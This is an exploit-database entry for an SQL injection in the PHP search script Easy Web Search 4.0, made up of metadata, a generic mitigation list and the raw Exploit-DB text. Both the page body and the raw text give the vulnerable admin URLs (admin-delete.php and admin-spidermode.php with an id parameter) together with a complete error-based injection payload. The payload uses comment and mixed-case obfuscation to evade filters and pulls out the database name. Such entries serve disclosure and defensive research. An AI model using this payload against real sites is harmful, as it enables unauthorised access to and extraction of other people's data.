Easy Web Search 4.0 - SQL Injection

vendor:

Easy Web Search

by:

Ihsan Sencan

N/A

CVSS

N/A

SQL Injection

CWE

Product Name: Easy Web Search

Affected Version From: 4.0

Affected Version To: 4.0

Patch Exists: N/A

Related CWE: N/A

CPE: a:nelliwinne:easy_web_search

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2017

Easy Web Search 4.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='

Mitigation:

Input validation and sanitization, use of prepared statements, use of stored procedures, use of parameterized queries, use of least privilege accounts, use of web application firewalls, use of secure coding practices, use of secure authentication and authorization methods, use of encryption for data in transit and at rest

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Easy Web Search 4.0 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164
# Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/
# Version: 4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/admin/admin-delete.php?id=[SQL]
# http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL]
#
# 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
#
# Etc..
# # # # #